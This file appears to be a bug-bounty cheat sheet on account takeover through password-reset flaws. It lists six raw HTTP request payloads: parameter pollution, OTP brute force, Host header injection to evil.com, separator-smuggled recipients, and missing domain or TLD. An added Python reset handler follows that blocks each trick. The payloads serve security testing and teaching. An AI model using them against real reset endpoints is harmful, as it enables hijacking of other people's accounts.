AllAboutBugBounty/AccountTakeover.md
Muhammad Daffa 35198d15d7
Account Takeover [2]
Add 3 tips
2020-09-03 21:04:19 +07:00

# Account Takeover

1. Parameter pollution in reset password

```
POST /reset
[...]
email=victim@mail.com&email=hacker@mail.com
```

2. Bruteforce the OTP code

```
POST /reset
[...]
email=victim@mail.com&code=$123456$
```

3. Host header injection

```
POST /reset
Host: evil.com
[...]
email=victim@mail.com
```

And the victim will receive the reset link pointing at evil.com.

4. Using a separator in the value of the parameter

```
POST /reset
[...]
email=victim@mail.com,hacker@mail.com
```

```
POST /reset
[...]
email=victim@mail.com%20hacker@mail.com
```

```
POST /reset
[...]
email=victim@mail.com|hacker@mail.com
```

5. No domain in the value of the parameter

```
POST /reset
[...]
email=victim
```

6. No TLD in the value of the parameter

```
POST /reset
[...]
email=victim@mail
```
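As a defensive counterpart to the six tips above, here is a small Python reset handler that closes each of them. This is an added example, not code from the AllAboutBugBounty repository: it refuses a body carrying more than one `email` parameter, applies a strict address check that rejects separators (`,`, `|`, whitespace), missing domains and missing TLDs, builds the reset link from a configured origin instead of the request's Host header, and limits OTP guesses with a single-use code and a constant-time compare. `RESET_BASE_URL`, `ALLOWED_HOSTS`, `MAX_OTP_ATTEMPTS` and the in-memory store are assumed values standing in for real application configuration.

```python
import hmac
import re
import secrets
from urllib.parse import parse_qs, urlencode

# Strict recipient check: one local part, one '@', a dotted domain and an
# alphabetic TLD. ',', '|' and whitespace are outside the character classes,
# so "victim@mail.com,hacker@mail.com", "victim" and "victim@mail" all fail.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}$")

# Assumed configuration: the app's own public origin, never the Host header.
RESET_BASE_URL = "https://app.example.com/reset/confirm"
ALLOWED_HOSTS = {"app.example.com"}
MAX_OTP_ATTEMPTS = 5


class ResetError(ValueError):
    """A reset request failed one of the checks below."""


def parse_single_email(body: str) -> str:
    """Return the one `email` value in a urlencoded body, or raise.

    Two `email` parameters (parameter pollution) are an error rather than a
    choice between first and last; a malformed address is an error too.
    """
    values = parse_qs(body, keep_blank_values=True).get("email", [])
    if len(values) != 1:
        raise ResetError("exactly one email parameter is required")
    if not EMAIL_RE.fullmatch(values[0]):
        raise ResetError("malformed email address")
    return values[0]


def accepts_email(body: str) -> bool:
    """True if the body passes parse_single_email, False otherwise."""
    try:
        parse_single_email(body)
        return True
    except ResetError:
        return False


def host_is_allowed(host_header: str) -> bool:
    """Only serve reset requests for hostnames we own (port stripped)."""
    hostname = host_header.split(":", 1)[0].strip().lower()
    return hostname in ALLOWED_HOSTS


def build_reset_link(token: str) -> str:
    """Build the link from configuration; the request's Host plays no part."""
    return f"{RESET_BASE_URL}?{urlencode({'token': token})}"


class OtpStore:
    """In-memory OTP store: attempt limit, single use, constant-time compare."""

    def __init__(self) -> None:
        self._codes = {}  # email -> [code, attempts_used]

    def issue(self, email: str) -> str:
        code = f"{secrets.randbelow(10**6):06d}"
        self._codes[email] = [code, 0]
        return code

    def has_pending(self, email: str) -> bool:
        return email in self._codes

    def verify(self, email: str, candidate: str) -> bool:
        entry = self._codes.get(email)
        if entry is None:
            return False
        entry[1] += 1
        if hmac.compare_digest(entry[0].encode(), candidate.encode()):
            del self._codes[email]  # single use
            return True
        if entry[1] >= MAX_OTP_ATTEMPTS:
            del self._codes[email]  # burn it; the user must request a new code
        return False


if __name__ == "__main__":
    # Constructed sample: one polluted body and one clean one.
    for body in ("email=victim@mail.com&email=hacker@mail.com", "email=victim@mail.com"):
        print(body, "->", "accepted" if accepts_email(body) else "rejected")
    print(build_reset_link(secrets.token_urlsafe(16)))
```

The address check is deliberately stricter than RFC 5322; for a reset endpoint, rejecting the rare exotic address is a better trade than accepting one that can carry a second recipient. The OTP store burns the code after `MAX_OTP_ATTEMPTS` wrong guesses instead of merely slowing the client, so a six-digit code cannot be enumerated across many requests.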